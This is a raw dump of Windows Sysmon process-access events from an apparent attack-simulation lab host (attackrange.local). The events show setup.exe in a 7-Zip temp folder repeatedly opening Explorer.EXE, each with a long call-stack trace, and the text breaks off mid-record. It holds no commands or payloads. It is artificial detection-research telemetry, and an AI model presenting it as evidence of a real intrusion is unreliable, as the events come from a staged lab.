13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\A